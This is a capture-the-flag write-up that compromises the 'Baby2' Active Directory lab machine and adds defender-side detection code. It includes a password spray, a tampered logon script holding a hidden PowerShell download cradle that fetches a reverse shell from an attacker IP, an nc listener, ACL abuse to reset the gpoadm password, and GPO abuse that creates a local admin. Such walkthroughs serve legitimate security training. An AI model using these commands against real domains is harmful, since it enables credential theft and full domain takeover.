VL-Baby2

Nmap

PORT     STATE SERVICE       REASON          VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-14 23:10:17Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
|_ssl-date: 2025-03-14T23:11:42+00:00; -2h00m00s from scanner time.
| rdp-ntlm-info:
| Target_Name: BABY2
| NetBIOS_Domain_Name: BABY2
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: baby2.vl
| DNS_Computer_Name: dc.baby2.vl
| DNS_Tree_Name: baby2.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-03-14T23:11:01+00:00

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -2h00m00s, deviation: 0s, median: -2h00m00s
| smb2-time:
| date: 2025-03-14T23:11:04
|_ start_date: N/A

User

Shares

netexec smb 10.10.89.250 -u 'guest' -p '' --shares


NETLOGON

Looking into the Netlogon share we find a login.vbs

smbclient  //10.10.89.250/NETLOGON -U 'guest'


Sub MapNetworkShare(sharePath, driveLetter)
    Dim objNetwork
    Set objNetwork = CreateObject("WScript.Network")

    ' Check if the drive is already mapped
    Dim mappedDrives
    Set mappedDrives = objNetwork.EnumNetworkDrives
    Dim isMapped
    isMapped = False
    For i = 0 To mappedDrives.Count - 1 Step 2
        If UCase(mappedDrives.Item(i)) = UCase(driveLetter & ":") Then
            isMapped = True
            Exit For
        End If
    Next

    If isMapped Then
        objNetwork.RemoveNetworkDrive driveLetter & ":", True, True
    End If

    objNetwork.MapNetworkDrive driveLetter & ":", sharePath

    If Err.Number = 0 Then
        WScript.Echo "Mapped " & driveLetter & ": to " & sharePath
    Else
        WScript.Echo "Failed to map " & driveLetter & ": " & Err.Description
    End If

    Set objNetwork = Nothing
End Sub

MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"

Apps

On the apps share we find a changelog and a .lnk file pointing at login.vbs under SYSVOL\scripts:

smbclient  //10.10.89.250/apps -U 'guest'


CHANGELOG:

[0.2]

- Added automated drive mapping

[0.1]

- Rolled out initial version of the domain logon script

Home

smbclient //10.10.89.250/homes -U 'guest'

Possible Usernames:

Amelia.Griffiths
Carl.Moore
Harry.Shaw
Joan.Jennings
Joel.Hurst
Kieran.Mitchell
library
Lynda.Bailey
Mohammed.Harris
Nicola.Lamb
Ryan.Jenkins

Also we can find all of the usernames using lookupsid:

impacket-lookupsid guest@10.10.89.250 -no-pass
1000: BABY2\DC$ (SidTypeUser)
1101: BABY2\DnsAdmins (SidTypeAlias)
1102: BABY2\DnsUpdateProxy (SidTypeGroup)
1103: BABY2\gpoadm (SidTypeUser)
1104: BABY2\office (SidTypeGroup)
1105: BABY2\Joan.Jennings (SidTypeUser)
1106: BABY2\Mohammed.Harris (SidTypeUser)
1107: BABY2\Harry.Shaw (SidTypeUser)
1108: BABY2\Carl.Moore (SidTypeUser)
1109: BABY2\Ryan.Jenkins (SidTypeUser)
1110: BABY2\Kieran.Mitchell (SidTypeUser)
1111: BABY2\Nicola.Lamb (SidTypeUser)
1112: BABY2\Lynda.Bailey (SidTypeUser)
1113: BABY2\Joel.Hurst (SidTypeUser)
1114: BABY2\Amelia.Griffiths (SidTypeUser)
1602: BABY2\library (SidTypeUser)
2601: BABY2\legacy (SidTypeGroup)

Foothold

After spraying each username as its own password, we find that library and Carl.Moore both use their username as their password, which gives us more access to the shares:

netexec smb 10.10.109.97 -u usernames.txt  -p usernames.txt --no-bruteforce --continue-on-success


netexec smb 10.10.109.97 -u "Carl.Moore" -p "Carl.Moore" --shares

We now have READ on SYSVOL, and READ and WRITE on the homes, docs, and apps shares!
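From the defender's side, the spray above is easy to miss with per-account lockout counters because each account sees a single failure. This added example (not from the original writeup) flags a source that fails against many distinct accounts inside a short window; the events are constructed, and 10.10.89.50 is an assumed workstation whose user simply mistyped a password twice.

```python
"""Password-spray detection over constructed failed-logon events."""
from collections import defaultdict
from datetime import datetime, timedelta

# Event IDs treated as authentication failures:
# 4625 = failed logon on the host, 4771 = Kerberos pre-auth failed on the DC.
FAILURE_IDS = {4625, 4771}

# Constructed sample events: (timestamp, event id, target account, source IP).
# 10.8.5.195 is the attacker box from the writeup; 10.10.89.50 is an assumed
# workstation with two ordinary typos from one user.
SAMPLE_EVENTS = [
    ("2025-03-14T23:12:00", 4771, "Amelia.Griffiths", "10.8.5.195"),
    ("2025-03-14T23:12:01", 4771, "Harry.Shaw", "10.8.5.195"),
    ("2025-03-14T23:12:01", 4771, "Joan.Jennings", "10.8.5.195"),
    ("2025-03-14T23:12:02", 4771, "Joel.Hurst", "10.8.5.195"),
    ("2025-03-14T23:12:02", 4771, "Kieran.Mitchell", "10.8.5.195"),
    ("2025-03-14T23:12:03", 4624, "Carl.Moore", "10.8.5.195"),  # spray hit: a success
    ("2025-03-14T23:12:03", 4771, "Lynda.Bailey", "10.8.5.195"),
    ("2025-03-14T23:05:10", 4625, "Harry.Shaw", "10.10.89.50"),
    ("2025-03-14T23:05:40", 4625, "Harry.Shaw", "10.10.89.50"),
]


def spray_sources(events, window=timedelta(minutes=5), min_targets=5):
    """Return {source_ip: sorted distinct accounts} for every source that failed
    against at least `min_targets` different accounts inside one `window`."""
    failures = defaultdict(list)
    for ts, event_id, account, source in events:
        if event_id in FAILURE_IDS:
            failures[source].append((datetime.fromisoformat(ts), account.lower()))
    flagged = {}
    for source, fails in failures.items():
        fails.sort()
        for i, (start, _) in enumerate(fails):
            # Distinct accounts seen from this source within `window` of `start`.
            seen = {acct for t, acct in fails[i:] if t - start <= window}
            if len(seen) >= min_targets:
                flagged[source] = sorted(seen)
                break
    return flagged


if __name__ == "__main__":
    for source, accounts in spray_sources(SAMPLE_EVENTS).items():
        print(f"possible spray from {source}: {len(accounts)} accounts -> {accounts}")
```

The successful 4624 for Carl.Moore from the same source is the follow-up signal worth correlating: a spray source that then logs in is the account to reset first.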

Bloodhound

Now that we also have LDAP access, we run the BloodHound collector (bloodhound-python, or via netexec as below) to get a view of the domain:

netexec ldap 10.10.89.250 -u 'library' -p 'library'  --bloodhound --dns-server 10.10.89.250 -c All --dns-tcp


LOGIN.VBS

We will replace the login.vbs script with the one below so we can get a shell. First we pull the original from SYSVOL:

smbclient //10.10.109.97/SYSVOL -U 'Carl.Moore'
get login.vbs

Now we change the login.vbs to:

Set oShell = CreateObject("WScript.Shell")
oShell.Run("powershell.exe -nop -w hidden -ep bypass -c IEX(IWR http://10.8.5.195:8080/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.8.5.195 3001")

Here is the ps1 shell I use: https://github.com/antonioCoco/ConPtyShell

Then we start our listener and wait for a user to log in:

stty raw -echo; (stty size; cat) | nc -lvnp 3001
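The root cause here is a domain logon script in NETLOGON/SYSVOL that a regular user can overwrite. This added example (not the writeup's or the lab's code) is the defender-side check: compare each script against a SHA-256 baseline taken at rollout and scan it for download-cradle patterns a drive-mapping script never needs. The two script bodies are constructed, shortened stand-ins for the legitimate and tampered login.vbs shown above.

```python
"""Logon-script integrity check for scripts served from NETLOGON/SYSVOL."""
import hashlib
import re

# Patterns a drive-mapping logon script has no reason to contain.
SUSPICIOUS = {
    "shell object": re.compile(r"WScript\.Shell", re.I),
    "powershell launch": re.compile(r"powershell(\.exe)?\b", re.I),
    "download cradle": re.compile(r"\b(IEX|Invoke-Expression|IWR|Invoke-WebRequest|DownloadString)\b", re.I),
    "policy bypass": re.compile(r"-(ep|ExecutionPolicy)\s+bypass", re.I),
    "remote URL": re.compile(r"https?://", re.I),
}

# Constructed stand-ins for the two versions of login.vbs seen above.
LEGIT_SCRIPT = (
    'Set objNetwork = CreateObject("WScript.Network")\r\n'
    'objNetwork.MapNetworkDrive "V:", "\\\\dc.baby2.vl\\apps"\r\n'
)
TAMPERED_SCRIPT = (
    'Set oShell = CreateObject("WScript.Shell")\r\n'
    'oShell.Run("powershell.exe -nop -w hidden -ep bypass -c IEX(IWR http://10.8.5.195:8080/x.ps1)")\r\n'
)


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def audit_logon_script(content: str, baseline_hash: str) -> dict:
    """Compare a script against its baseline hash and scan it for cradle patterns.
    Both checks matter: a hash mismatch alone may be a legitimate edit, and a
    pattern hit with a matching hash means the baseline itself was bad."""
    hits = [label for label, pattern in SUSPICIOUS.items() if pattern.search(content)]
    hash_match = sha256_hex(content) == baseline_hash
    return {
        "hash_match": hash_match,
        "hits": hits,
        "verdict": "ok" if hash_match and not hits else "investigate",
    }


if __name__ == "__main__":
    baseline = sha256_hex(LEGIT_SCRIPT)
    print("legit:   ", audit_logon_script(LEGIT_SCRIPT, baseline))
    print("tampered:", audit_logon_script(TAMPERED_SCRIPT, baseline))
```

The check only helps if the share ACL is also fixed: Domain Users should have read access to NETLOGON scripts, and write access should be limited to the admins who maintain them.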

ROOT

Shell as Amelia.Griffiths


Amelia is a member of the legacy group, and we identified earlier that legacy has WriteDacl over the GPOADM user. Following the BloodHound abuse notes, we first grant the legacy group GenericAll over GPOADM:

Add-DomainObjectAcl -TargetIdentity "GPOADM" -PrincipalIdentity legacy -Domain baby2.vl -Rights All -Verbose

Now that we have GenericAll, we change the password of GPOADM:

$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity "GPOADM" -AccountPassword $UserPassword

GPO Abuse

As we saw earlier, GPOADM has GenericAll over the Default Domain Policy, so we use a tool named pyGPOAbuse to exploit it: https://github.com/Hackndo/pyGPOAbuse

We grab the GPO ID and run the script, which creates a user:

python3 pygpoabuse.py 'baby2.vl/gpoadm:Password123!' -gpo-id '6AC1786C-016F-11D2-945F-00C04FB984F9' -f

After running the command we need a gpupdate so the changes get applied:

gpupdate /force

We then see the new user we created, john:H4x00r123.., in the local Administrators group:

evil-winrm -i 10.10.109.97 -u 'john' -p 'H4x00r123..'
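For anyone defending a domain, the GPO step leaves an artifact in SYSVOL worth auditing. This added example (not from the writeup or from pyGPOAbuse) assumes the tool adds an immediate scheduled task under the GPO's Machine\Preferences\ScheduledTasks\ScheduledTasks.xml that runs as SYSTEM and creates the local admin; the XML below is a constructed, simplified stand-in for that file, with an ordinary cleanup task included to show what is not flagged.

```python
"""Audit a GPO Scheduled Tasks preference file for tasks that add local admins."""
import re
import xml.etree.ElementTree as ET

# Constructed, simplified stand-in for ScheduledTasks.xml (clsid/uid attributes omitted).
SAMPLE_XML = """<ScheduledTasks>
  <ImmediateTaskV2 name="update">
    <Properties action="C" name="update" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3"><Actions Context="Author"><Exec>
        <Command>cmd.exe</Command>
        <Arguments>/c net user john H4x00r123.. /add &amp;&amp; net localgroup administrators john /add</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 name="CleanupTemp">
    <Properties action="C" name="CleanupTemp" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3"><Actions Context="Author"><Exec>
        <Command>cmd.exe</Command><Arguments>/c del /q C:\\Temp\\*.tmp</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>"""

# "net user X Y /add" or "net localgroup administrators X /add" (net1 alias too).
ADMIN_CHANGE = re.compile(
    r"net1?\s+(user\s+\S+\s+\S+\s+/add|localgroup\s+administrators\s+\S+\s+/add)", re.I)


def suspicious_gpo_tasks(xml_text: str) -> list:
    """Return (task name, runAs, command line) for every task whose action
    creates a local account or adds one to the local Administrators group."""
    findings = []
    for task in ET.fromstring(xml_text):
        props = task.find("Properties")
        if props is None:
            continue
        run_as = props.get("runAs", "")
        for exc in props.iter("Exec"):
            cmdline = f"{exc.findtext('Command', '')} {exc.findtext('Arguments', '')}".strip()
            if ADMIN_CHANGE.search(cmdline):
                findings.append((task.get("name"), run_as, cmdline))
    return findings


if __name__ == "__main__":
    for name, run_as, cmdline in suspicious_gpo_tasks(SAMPLE_XML):
        print(f"[!] task {name!r} runs as {run_as}: {cmdline}")
```

Pair this with alerting on version changes of the Default Domain Policy, since clients only apply the new task after the GPO version is raised, and with a review of who holds write rights on that GPO, which here was a plain user account.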

https://api.vulnlab.com/api/v1/share?id=762ae368-a3d3-42da-810c-4f17964e01fb